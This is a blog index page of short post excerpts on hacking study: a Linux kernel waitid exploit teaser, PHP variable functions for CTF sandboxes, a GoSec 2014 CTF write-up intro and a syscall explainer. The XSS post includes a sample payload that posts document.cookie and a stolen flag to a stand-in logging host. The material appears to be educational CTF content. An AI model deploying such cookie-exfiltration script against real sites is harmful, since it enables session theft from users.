Modern Linux Kernel 0,1-day Unkind-Exploitations Review

posted by zer0day tl;dr Last time, I posted about 1-day vulnerability CVE-2017-5123, waitid() arbitrary R/W with null-deref on LK v4.13.x/~v4.14.0-rc4. It just happened because there's no any sanity check whether input space (*infop exactly) is kernel-land or user-land. Also, you can find other good payloads that include sandbox-bypass like chrome-sandbox (actually, it's kinda different vulnerability, but...), fully-chained sth, etc... Anyway, recently, I've been [Read More]

XSS - import .js file

XSS를 할때 <script> 태그가 막혀있고, <img src=@ onerror=script>와 같은 tag 안에 script를 넣어 공격을 해야하는 상황에서 긴 script를 넣어야 할때 유용하게 쓸 수 있습니다. example $.post("/login.php", { 'id': 'admin', }, function( data ) { $.get("/flag.php", function( data ) { $.post("http://example.com/log", { 'cookie': document.cookie, 'flag': data }, function( data ) { console.log(data); }); }); }); javascript 코드안에서 js 파일을 import 하는 [Read More]

PHP 가변함수로 문제를 풀어보자

PHP는 가장 유명한 웹프로그래밍 언어 중 하나입니다. 그래서 웹해킹을 공부한다면, 필수적으로 PHP에 대해서 알아야 한다. 이 포스팅에서 소개할 PHP의 가변함수는 CTF나 워게임에서 PHP Sandbox 문제가 나왔을 때 많은 도움을 줄 것이다. PHP의 가변함수는 단순히 해커들이 발견한 trick이 아니라, PHP에서 직접 지원해주는 정식의 기능이다. PHP.net의 가변함수에 대한 정보 <?php function foo() { echo "foo() 안입니다.<br />\n"; } function bar($arg = '') { echo "bar() 안입니다; 인수는 [Read More]

Find online hot single mom[GoSec 2014]

CTF에서 웹이라는 분야는 웹 서비스의 특성상 다시 풀어보기가 어려운 분야이다. 헌데 우연히 GoSec 2014에 출제되었던 문제를 풀어볼 수 있는 기회가 생기게되어 이에 대한 라이트업을 작성해보고자 한다. 다시 풀어볼 수 있는 링크는 이와같다. http://challenges.ringzer0team.com:10158/ (만약 Write-Up을 제공함으로써 문제에 대한 가치를 홰손하게 되는 경우가 발생하면 바로 글을 삭제하도록 하겠다, 또한 Sql injection에 사용된 코드는 올리지 않았으며 문제를 풀기위한 핵심 쿼리를 올려놓았다. 만약 공부를 위해 코드가 필요한 경우는 2peopledesu@ [Read More]

Syscall Who is?

안녕하세요. Demon 팀의 c0nstant입니다. 틈틈히 공부중인 syscall에 대해 간단하게 설명해보고자 합니다. 제가 이것을 공부하게 된 계기는 pwnable.kr의 문제를 풀기 위함 이었습니다. 하지만, 공부 해두니 정말 알아야 하는 정보였기에 복습 차원에서 적어보려 합니다. 아직 공부중인 내용이라 부족함이 있을 수도 있습니다. ^.^ 시작합니다 !! 이놈은 도대체 뭐하는 녀석일까요? 고민을 한번 해봅시다. !! 대부분 프로그램에 쓰이는 단어들은 영어의 조합으로 이루어져 있음을 눈치챌 수 있을 것입니다. 이 녀석도 system과 call이라는 단어의 합성어라는 사실을 인지할 수 있게 [Read More]